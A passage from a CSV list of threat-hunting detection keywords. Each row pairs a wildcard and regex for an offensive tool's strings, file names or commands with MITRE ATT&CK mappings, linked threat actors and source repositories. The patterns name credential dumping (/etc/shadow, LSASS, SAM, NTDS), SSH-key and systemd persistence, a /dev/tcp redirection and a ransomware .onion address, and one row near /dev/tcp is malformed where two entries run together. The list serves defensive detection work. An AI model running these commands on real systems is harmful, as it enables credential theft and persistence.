This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37552" "*cannot encode the shellcode when self-executing the payload*",".{0,1000}cannot\sencode\sthe\sshellcode\swhen\sself\-executing\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","37553" "*Cannot enumerate antivirus*",".{0,1000}Cannot\senumerate\santivirus.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","37554" "*Cannot get LSASS PID on remote host*",".{0,1000}Cannot\sget\sLSASS\sPID\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37556" "*Cannot load SAM functions on remote host*",".{0,1000}Cannot\sload\sSAM\sfunctions\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37557" "*Cannot open LSA policy on remote host*",".{0,1000}Cannot\sopen\sLSA\spolicy\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37558" "*Cannot open registry key HKLM\SECURITY\Policy\Secrets on remote host*",".{0,1000}Cannot\sopen\sregistry\skey\sHKLM\\SECURITY\\Policy\\Secrets\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37559" "*Cannot open SAM on remote host*",".{0,1000}Cannot\sopen\sSAM\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","37560" "*Cannot send REVSOCKS_NORMAL handshake!*",".{0,1000}Cannot\ssend\sREVSOCKS_NORMAL\shandshake!.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","37561" "*Cannot start wstunnel server:*",".{0,1000}Cannot\sstart\swstunnel\sserver\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","37562" "*Can't find DHCP Server PID. Exiting.*",".{0,1000}Can\'t\sfind\sDHCP\sServer\sPID\.\sExiting\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","#content","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","37563" "*capcom_sys_exec*",".{0,1000}capcom_sys_exec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37564" "*capcom_sys_exec.x64.dll*",".{0,1000}capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37565" "*CaptainNox/Hypnos*",".{0,1000}CaptainNox\/Hypnos.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","37566" "*captcha-killer.*.jar*",".{0,1000}captcha\-killer\..{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","37567" "*capture/lockout_keylogger*",".{0,1000}capture\/lockout_keylogger.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","37568" 
"*CapturedCredential.cs*",".{0,1000}CapturedCredential\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37569" "*CapturedCredential.exe*",".{0,1000}CapturedCredential\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37570" "*CapturedHashCredential.*",".{0,1000}CapturedHashCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37571" "*CapturedPasswordCredential.*",".{0,1000}CapturedPasswordCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37572" "*CapturedTicketCredential.*",".{0,1000}CapturedTicketCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","37573" "*capturetokenphish.ps1*",".{0,1000}capturetokenphish\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","37574" "*capturetokenphish.py*",".{0,1000}capturetokenphish\.py.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","37575" "*CarbonCopy*",".{0,1000}CarbonCopy.{0,1000}","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. 
Works for both Windows and Linux","T1553.002 - T1588.004 - T1205 - T1027","TA0005 - TA0008 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","N/A","10","1359","283","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z","37576" "*CarbonCopy.py*",".{0,1000}CarbonCopy\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","37577" "*cardano2john.py*",".{0,1000}cardano2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","37578" "*careCrow*_linux_amd64*",".{0,1000}careCrow.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - 
Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","37579" "*cargo install glit*",".{0,1000}cargo\sinstall\sglit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","37580" "*cargo install rsocx*",".{0,1000}cargo\sinstall\srsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","37581" "*cargo install rsocx*",".{0,1000}cargo\sinstall\srsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","37582" 
"*carlospolop/PEASS-ng*",".{0,1000}carlospolop\/PEASS\-ng.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37584" "*carlospolop/PurplePanda*",".{0,1000}carlospolop\/PurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","37585" "*CarSeat: A junior Seatbelt\n*",".{0,1000}CarSeat\:\sA\sjunior\sSeatbelt\\n.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#content","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","37586" "*cartelirsn5l54ehcbalyyqtfb3j7be2rpvf6ujayaf5qqmg3vlwiayd.onion*",".{0,1000}cartelirsn5l54ehcbalyyqtfb3j7be2rpvf6ujayaf5qqmg3vlwiayd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","37587" "*cat *.bin | base64 -w 0 > 
*.txt*",".{0,1000}cat\s.{0,1000}\.bin\s\|\sbase64\s\-w\s0\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","37592" "*cat *.ntds",".{0,1000}cat\s.{0,1000}\.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","37597" "*cat *.pub >> */authorized_keys*",".{0,1000}cat\s.{0,1000}\.pub\s\>\>\s.{0,1000}\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","37600" "*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp",".{0,1000}cat\s\.\/apache\-tomcat\-8\.5\.77\/webapps\/ROOT\/tomcatwar\.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","0","#linux","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","37604" "*cat /etc/shadow*",".{0,1000}cat\s\/etc\/shadow.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such 
as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","37614" "*cat /etc/sudoers 2>/dev/null*",".{0,1000}cat\s\/etc\/sudoers\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","37615" "*cat <<-EOF > /usr/lib/systemd/system-generators/generator*",".{0,1000}cat\s\<\<\-EOF\s\>\s\/usr\/lib\/systemd\/system\-generators\/generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","37619" "*cat > /dev/tcp/127.0.0.1*<\s\/dev\/tcp\/127\.0\.0\.1.{0,1000}\<\*",".{0,1000}catchetumbotifyoucan\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data 
exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","37623" "*catphish.rb*",".{0,1000}catphish\.rb.{0,1000}","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ring0lab/catphish","1","1","N/A","N/A","N/A","7","612","118","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z","37624" "*catspin.sh http*",".{0,1000}catspin\.sh\shttp.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37625" "*catspin.sh -info*",".{0,1000}catspin\.sh\s\-info.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37626" "*catspin.sh -kill*",".{0,1000}catspin\.sh\s\-kill.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37627" "*catspin.sh -run *",".{0,1000}catspin\.sh\s\-run\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37628" "*catspin_for_readme.mp4*",".{0,1000}catspin_for_readme\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37629" "*catspin_poc.mp4*",".{0,1000}catspin_poc\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37630" "*catspin_poc_final.mp4*",".{0,1000}catspin_poc_final\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","37631" "*CB 4D 85 D2 74 10 41 8A 00 4D 03 C3 88 02 49 03 D3 4D 2B D3*",".{0,1000}CB\s4D\s85\sD2\s74\s10\s41\s8A\s00\s4D\s03\sC3\s88\s02\s49\s03\sD3\s4D\s2B\sD3.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","#content","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37632" 